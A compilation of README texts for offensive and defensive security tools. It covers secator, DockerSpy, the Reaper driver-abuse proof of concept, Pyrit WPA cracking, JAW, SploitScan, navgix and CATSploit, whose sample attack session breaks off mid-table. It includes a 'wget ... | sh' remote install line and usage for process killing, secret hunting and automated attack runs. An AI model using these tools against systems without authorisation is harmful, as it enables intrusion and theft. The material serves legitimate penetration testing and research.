secator
is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.
Curated list of commands
Unified input options
Unified output schema
CLI and library usage
Distributed options with Celery
Complexity from simple tasks to complex workflows
secator
integrates the following tools:
Name | Description | Category |
---|---|---|
httpx | Fast HTTP prober. | http |
cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
gospider | Fast web spider written in Go. | http/crawler |
katana | Next-generation crawling and spidering framework. | http/crawler |
dirsearch | Web path discovery. | http/fuzzer |
feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
ffuf | Fast web fuzzer written in Go. | http/fuzzer |
h8mail | Email OSINT and breach hunting tool. | osint |
dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
subfinder | Fast subdomain finder. | recon/dns |
fping | Find alive hosts on local networks. | recon/ip |
mapcidr | Expand CIDR ranges into IPs. | recon/ip |
naabu | Fast port discovery tool. | recon/port |
maigret | Hunt for user accounts across many websites. | recon/user |
gf | A wrapper around grep to avoid typing common patterns. | tagger |
grype | A vulnerability scanner for container images and filesystems. | vuln/code |
dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
wpscan | WordPress Security Scanner | vuln/multi |
nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator
, you can plug it in (see the dev guide).
pipx install secator
pip install secator
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier: alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal: secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator
uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator
does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool which should work on all systems supporting apt
:
secator install tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use: secator install tools httpx
Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.
secator
comes installed with the minimum amount of dependencies.
There are several addons available for secator
:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator
makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf
):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
and more... to list all tasks / workflows / scans that you can use:
secator x --help
secator w --help
secator s --help
To go deeper with secator
, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.
Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.
Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.
Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:
Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.
Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.
Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.
Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.
Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.
Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.
DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.
To use DockerSpy, follow these steps:
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
dockerspy
To customize DockerSpy configurations, edit the following files: - Regular Expressions - Ignored File Extensions
DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
Consider following me:
Special thanks to @akaclandestine
A vulnerable application made using node.js, express server and ejs template engine. This application is meant for educational purposes only.
git clone https://github.com/4auvar/VulnNodeApp.git
npm install
CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
create database vuln_node_app_db;
GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
USE vuln_node_app_db;
create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");
npm start
You can reach me out at @4auvar
Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.
Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.
Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.
____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/
[Coded by MrEmpy]
[v1.0]
Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process
Values:
PROCESSID process id to suspend/kill
Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337
You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.
Note: The executable and driver must be in the same directory.
Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.
Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.
These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).
An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.
This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0
. See here for more information.
JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.
Release Notes:
JAW-V2
branch.JAW-V1
branch.The architecture of the JAW is shown below.
JAW can be used in two distinct ways:
Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path
.
Web Application Analysis: Analyze a web application by providing a single seed URL.
Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.
Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).
Query the constructed Neo4j
graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.
JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.
The outputs will be stored in the same folder as that of input.
The installation script relies on the following prerequisites: - Latest version of npm package manager
(node js) - Any stable version of python 3.x
- Python pip
package manager
Afterwards, install the necessary dependencies via:
$ ./install.sh
For detailed
installation instructions, please see here.
You can run an instance of the pipeline in a background screen via:
$ python3 -m run_pipeline --conf=config.yaml
The CLI provides the following options:
$ python3 -m run_pipeline -h
usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]
This script runs the tool pipeline.
optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)
Input Config: JAW expects a .yaml
config file as input. See config.yaml for an example.
Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).
For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:
$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js
This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScipt file that you already have on your file system, you can skip this step.
JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.
This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:
$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>
The foxhoundpath
is by default set to the following directory: crawler/foxhound/firefox
which contains a binary named firefox
.
Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.
To start the crawler, do:
$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true
See here for more information.
To start the crawler, do:
$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d
Please refer to the documentation of the hpg_crawler
here for more information.
To generate an HPG for a given (set of) JavaScript file(s), do:
$ node engine/cli.js --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv
optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)
To import an HPG inside a neo4j graph database (docker instance), do:
$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h
usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]
This script imports a CSV of a property graph into a neo4j docker database.
optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)
In order to create a hybrid property graph for the output of the hpg_crawler
and import it inside a local neo4j instance, you can also do:
$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>
Specification of Parameters:
<path>
: absolute path to the folder containing the program files for analysis (must be under the engine/outputs
folder).--js=<program.js>
: name of the JavaScript program for analysis (default: js_program.js
).--import=<bool>
: whether the constructed property graph should be imported to an active neo4j database (default: true).--hybrid=bool
: whether the hybrid mode is enabled (default: false
). This implies that the tester wants to enrich the property graph by inputing files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.--reqs=<requests.out>
: for hybrid mode only, name of the file containing the sequence of obsevered network requests, pass the string false
to exclude (default: request_logs_short.out
).--evts=<events.out>
: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false
to exclude (default: events.out
).--cookies=<cookies.pkl>
: for hybrid mode only, name of the file containing the cookies, pass the string false
to exclude (default: cookies.pkl
).--html=<html_snapshot.html>
: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false
to exclude (default: html_rendered.html
).For more information, you can use the help CLI provided with the graph construction API:
$ python3 -m engine.api -h
The constructed HPG can then be queried using Cypher or the NeoModel ORM.
You should place and run your queries in analyses/<ANALYSIS_NAME>
.
You can use the NeoModel ORM to query the HPG. To write a query:
example_query_orm.py
in the analyses/example
folder.$ python3 -m analyses.example.example_query_orm
For more information, please see here.
You can use Cypher to write custom queries. For this:
example_query_cypher.py
in the analyses/example
folder.$ python3 -m analyses.example.example_query_cypher
For more information, please see here.
This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering
Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:
request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]
cs_csrf:
enabled: false
# [...]
Step 2. Run an instance of the pipeline with:
$ python3 -m run_pipeline --conf=config.yaml
Hint. You can run multiple instances of the pipeline under different screen
s:
$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]
To generate parallel configuration files automatically, you may use the generate_config.py
script.
The outputs will be stored in a file called sink.flows.out
in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a, semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC']
is forgeable through the window.location
injection point. However, a request marked with ['NON-REACH']
is not forgeable.
An example output entry is shown below:
[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })
1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href
This entry shows that on line 29, there is a $.ajax
call expression, and this call expression triggers an ajax
request with the url template value of ajaxloc + "/bearer1234/
, where the parameter ajaxloc
is a program slice reading its value at line 6 from window.location.href
, thus forgeable through ['WIN.LOC']
.
In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js
web application which you can test JAW with.
First, install the dependencies via:
$ cd tests/test-webapp
$ npm install
Then, run the application in a new screen:
$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'
For more information, visit our wiki page here. Below is a table of contents for quick access.
Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.
If you use the JAW for academic research, we encourage you to cite the following paper:
@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}
JAW has come a long way and we want to give our contributors a well-deserved shoutout here!
@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.
SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.
Regular:
python sploitscan.py CVE-YYYY-NNNNN
Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.
python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN
Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.
python sploitscan.py CVE-YYYY-NNNNN -e JSON
The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:
This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.
Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.
Alexander Hagenah - URL - Twitter
navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities
Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:
navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.
navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.
git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build
Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.
Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.
Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).
Scan
Analyze
This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.
You can simply run Bugsy from the command line, using npx:
CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentesterβs skill) .
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.
Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.
Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.
Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.
CATSploit has the following prerequisites:
For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json
, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
_________ ___________ __ _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with -h
option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}
options:
-h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit
host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit
scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit
scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit
scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned
plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit
attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute
options:
-h, --help show this help message and exit
post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit
reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit
exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit
In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
ββββββββββββ³βββββββββββββββββ³βββββββββββ³βββββββββββββββββββββββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β attacker β 0.0.0.0 β kali β kali 2022.4 β True β
β h_exbiy6 β 192.168.0.10 β β Linux 3.10 - 4.11 β False β
β h_nhqyfq β 192.168.0.20 β β Microsoft Windows 7 SP1 β False β
ββββββββββββ΄ ββββββββββββββββ΄βββββββββββ΄βββββββββββββββββββββββββββββββββββ΄ββββββββ
catsploit> host detail h_exbiy6
ββββββββββββ³βββββββββββββββ³βββββββββββ³βββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β h_exbiy6 β 192.168.0.10 β ubuntu β ubuntu 14.04 β False β
ββββββββββββ΄βββββββββββββββ΄βββββββββββ΄βββββββββββββββ΄β ββββββ
[IP address]
ββββββββββββββββ³βββββββββββ³βββββββ³βββββββββββββ
β ipv4 β ipv4mask β ipv6 β ipv6prefix β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β β β β
βββββββββββββ ββ΄βββββββββββ΄βββββββ΄βββββββββββββ
[Open ports]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββ³βββββββββββββββ³βββββββββββββββββββββββββββββ
β ip β proto β port β service β product β version β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 21 β ftp β ProFTPD β 1.3.5 β
β 192.168.0.10 β tcp β 22 β ssh β OpenSSH β 6.6.1p1 Ubuntu 2ubuntu2.10 β
β 192.168.0.10 β tcp β 80 β http β Apache httpd β 2.4.7 β
β 192.168.0.10 β tcp β 445 β netbios-ssn β Samba smbd β 3.X - 4.X β
β 192.168.0.10 β tcp β 631 β ipp β CUPS β 1.7 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββ΄βββββββββββββββ΄βββββββββββββββββββββββββββββ
[Vulnerabilities]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ³βββββββββββββββββ
β ip β proto β port β vuln_name β cve β
β‘βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 0 β TCP Timestamps Information Disclosure β N/A β
β 192.168.0.10 β tcp β 21 β FTP Unencrypted Cleartext Login β N/A β
β 192.168.0.10 β tcp β 22 β Weak MAC Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Encryption Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Host Key Algorithm(s) (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 80 β Test HTTP dangerous methods β N/A β
β 192.168.0.10 β tcp β 80 β Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β CVE-2014-3704 β
β 192.168.0.10 β tcp β 80 β Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β N/A β
β 192.168.0.10 β tcp β 80 β Sensitive File Disclosure (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Unprotected Web App / Device Installers (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Cleartext Transmission of Sensitive Information via HTTP β N/A β
β 192.168.0.10 β tcp β 80 β jQuery < 1.9.0 XSS Vulnerability β CVE-2012-6708 β
β 192.168.0.10 β tcp β 80 β jQuery < 1.6.3 XSS Vulnerability β CVE-2011-4969 β
β 192.168.0.10 β tcp β 80 β Drupal 7.0 Information Disclosure Vulnerability - Active Check β CVE-2011-3730 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-2183 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-6329 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2020-12872 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2011-3389 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2015-0204 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββ& #9472;βββββββββββββ
[Users]
βββββββββββββ³ββββββββ
β user name β group β
β‘ββββββββββββββββββββ©
βββββββββββββ΄ββββββββ
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
βββββββββββββββ³βββββ ββββββββ³βββββββββββββββββ³ββββββββ³ββββββββ³ββββββββ³ββββββββββββββββββββββββββββββββ
β scenario id β src host ip β target host ip β eVc β eVd β steps β first attack step β
